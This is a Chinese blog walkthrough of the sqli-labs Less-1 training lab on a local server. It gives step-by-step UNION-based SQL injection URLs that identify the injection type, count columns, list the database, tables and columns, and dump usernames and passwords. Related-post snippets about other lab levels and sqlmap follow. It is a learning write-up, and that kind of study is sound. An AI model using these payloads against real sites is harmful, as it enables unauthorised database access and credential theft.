SQLi-less-1

最新推荐文章于 2024-05-29 22:14:46 发布
最新推荐文章于 2024-05-29 22:14:46 发布
阅读量180 收藏 1
点赞数
文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/morningstar929/article/details/108457775
版权

1.判断字符型还是整型注入

http://127.0.0.1/sqli/Less-1/?id=1 正常
http://127.0.0.1/sqli/Less-1/?id=1 and 1=1 与上述一样
http://127.0.0.1/sqli/Less-1/?id=1 and 1=2 与上述一样
由此可以判断不是整型注入
http://127.0.0.1/sqli/Less-1/?id=1%27%20and%201=1%20–+ 与上述一样
http://127.0.0.1/sqli/Less-1/?id=1%27%20and%201=2%20–+ 异常
由此可以判断存在字符型注入

2.使用order by查询该数据表的字段数量

http://127.0.0.1/sqli/Less-1/?id=1’ order by 3 --+ 正常
http://127.0.0.1/sqli/Less-1/?id=1’ order by 4 --+ 异常
由此判断存在3个字段

3.判断数据呈现位置

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,3 --+
根据结果,判断数据呈现位置为2,3

4.获取数据库名

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(database()) --+

5.获取数据库表名

在mysql中,可以通过查询information_schema表来获取响应的数据库表名和字段名
http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’) --+
通过结果可以获得相应的数据库表名

6.获取字段名

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’) --+
通过结果可以获得响应的字段名

7.获得数据

http://127.0.0.1/sqli/Less-1/?id=-1’ union select 1,2,(select group_concat(username,0x3a,password) from security.users) --+
最终获得数据

morningstar929
关注
sqli less1
klxxxxxx的博客
10-23 2682
sqli-labs less-1 前言 鄙人不才,只是把平时学习的笔记整理下来,仅供参考,望大家指点。 首先我们需要了解,什么是sql注入? SQL注入是比较常见的网络攻击方式,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写代码时的疏忽,导致他人可以通过操作输入来修改后台SQL语句达到代码执行,进行攻击的后果 注入手法的分类 注入手法可以分为: 联合查询注入、报错型注入、布尔型注入、延时注入、堆叠注入 从数据类型可以分为: 字符型、数值型 从注入位置可以分类为: GET数据(提交数据的方式为G
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1560
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-Less1
qq_44060093的博客
04-19 542
最近准备拾起sql注入,sql注入虽然去年就接触学习了,但是没有从原理入手学习,不精通 正好去年又学了数据库,这次颇有温故而知新的意思,温习一些以前掌握的,学习一些以前不知道的。 我用sqli开始学习sql注入,环境的搭建我之前也写过,挺简单的 首先看第一关,应该是没啥过滤,我们主要来学习步骤,流程,以及核心语句 首先发现id=1,可以查数据 再输入一个’ 可能有注入 构造?id=1’ and...
sqli less-01
ANYOUZHEN的博客
04-29 1335
我们试着输入id=1,查看是否有回显 接着输入id=1',发现出现报错 构造payload查询列表,?id=1' order by 3--+ 当我们输入?id=1' order by 4--+时出现了unknown,说明列表为3 接下来我们使用联合查询,?id=-1' union select 1,2,3--+; 然后发现2,3列有回应,说明可以爆破出数据库,列,用户和密码 接下来我们查询数据库,http://127.0.0.1/sqli/Less-1/?id=-1' union
SQLI-Lab】-Less1
xinyue9966的博客
01-20 245
SQLI-Less1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)前言一、GET单引号字符型注入二、步骤总结 前言 一、GET单引号字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 http://192.168.135.149/sqli/Less-1/?id=1' and 1=1 -
Sqli-Labs:Less-1
weixin_44227437的博客
05-04 399
sqli-1 基于错误_GET_单引号_字符型注入 0x01:判断是字符型注入还是数字型注入
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 2029
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 845
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
sqli-labs>>Less-1
YOUNGBC的博客
03-17 268
准备最近刷一下sqli-labs,也是一个边学习边实践的过程,希望自己可以坚持下去吧。 在这里先推荐一下用HackBar这个浏览器插件(FireFox/Chrome),怎么破解百度一下就成,我也不多说了,下面步入正题: 我们先输入http://localhost/sqli-labs-master/Less-1/?id=1测试一下,没有问题 http://localhost/sqli-l...
Sqli-labs靶场第18关详解[Sqli-labs-less-18]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 1339
所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件。尝试加上注入语句(报错注入),测试是否会执行并返回报错语句爆出想要的信息。使用单引号' 测试得到了报错即: ' 为闭合方式。在user-agent处加上*代表注入点。
sqli-labs—————Less-1(字符型注入)
Fly_鹏程万里
05-08 1989
前言从这一篇文章开始,我们将开始真正的讲解Sqli-libs中的各种注入,从第1阶层开始,后续的内容会陆续放出,欢迎各位大佬的关注与评论!Less-1首先,打开主页进入第一关:可以看到提示,提示我们要传入一个参数,名为ID,而且是数据类型,那么我就传入该参数看看到这里,我们可以发现后台执行的SQL语句好像是根据该传入的参数id进行了相应的查询,那么我可以从搭建的环境中来看看它的数据库到底有什么东西...
Sqli-Labs之less-1
ISNS的博客
02-03 1801
说在开头:文章是我通过查询资料后按照自己的理解总结出来的,所以如果有说法不对的地方,欢迎大佬指正~ 1.进入less-1的题目以后,我们可以看到这道题的提示“请输入ID作为带数值的参数”: 2.我们根据题目提示,尝试在URL中加上“?id=1”、“?id=2”,可以看到看到从数据库中查询到的用于登录login的用户名和密码: 我们要找的是网站后台管理员的用户名和密码,目的是拿到网站的权限,从...
Sqli-labs之Less-1
m0_46315342的博客
06-04 347
我们先来看看这个环境有哪些题: 接下来开始我们的学习之旅吧!                                   ...
sqli-lab刷题Less-1
MichealCurry1的博客
10-05 225
sqli1-lib刷题Less-1 本人是一名小白,刚开始进行web学习。 打开sqli-lib的Less-1,观察其页面。 可以看到,其页面提示输入id值,在url输入?id=1,提交id=1的参数,并且结合其给的提示,探测出其为单引号型的sql注入 之后拼接sql语句,在url输入?id=1’ order by 4 --+,order by会对列名称进行排序,多次试验发现为4时候报错,3不报错,证明该表名有3个字段 之后使用联合查询...
SQL注入——sqli-labs(Less-1)
最新发布
E-Malon的博客
05-29 318
一边查看源码,一边多方学习别人的 WriteUp,在此过程中补充基础知识,最终落到实验操作。慢慢来,比较快。欢迎大咖指导,欢迎各位网友交流经验。
sqli-less 笔记
WYJ____的博客
08-03 438
一 ' ?id=1' ?id=1' and 1=1%23 ?id=1' and 1=2%23 二 数值 ?id=1' ?id=1 and 1=1%23 ?id=1 and 1=2%23 三 ') ?id=1' ?id=1') and 1=1%23 ?id=1') and 1=2%23 四 ") ?id=1") ?id=1") and 1=1%23 ?id=1") and 1...
sqli靶场less1
qq_52986156的博客
10-08 115
利用sql系统函数带出版本和库名为5.0以上可以利用系统库information_schema。利用系统库和系统函数group_concat拼接带出系统全部的表名字和表中包含字段列名字。构造闭合用order by判断字段数带入发现3有值4报如下信息得出只有三个字段。利用联合union查询 让前面的id闭合报错得出存在值的字段数是2,3。用转义符号“\”可以看到回显报错如下,判断出闭合符为'不同id可以看到有返回不同值,判断该处为功能点。1先查找功能点,是否可以传参。
sqlmap sqli less-1
记录笔记
04-11 606
python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -dbs python sqlmap.py -u “http://192.168.1.122/sqli/Less-1/?id=1” -D security -tablespython python sqlmap.py -u “http://192.168.1..
sqli-labs less 1(菜鸟,刚学手工注入写的笔记)
qq_60829702的博客
09-17 1336
这也是我刚开始学手工注入,笔记写的还不够全面,里面少了一些注释,知识点还不全面,但我认为写的太全面对于像我一样刚接触的菜鸟不太好,因为写的太详细就会让自己产生一种错觉,认为自己已经懂了,就直接跳过这些东西,这种习惯不太好。还是要自己去查资料,去看一些官方的解释文档。下面这个博主的视频讲的也很好非常适合入门,大家如果不懂可以看这个大佬的视频。
SQLi-Labs 练习总结 Page-1 Less-1
灰蜗牛
08-28 1417
SQLi-LABS 练习总结Page-1 基础练习 写在前面:SQL注入是一个需要不断尝试的过程,其中可能出现很多问题才能有一次成功,不要心急,多尝试,多学习,多总结。 Less-1 GET-Error based-single quotes-String 为了学习的目的,尽可能的多做一些尝试:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值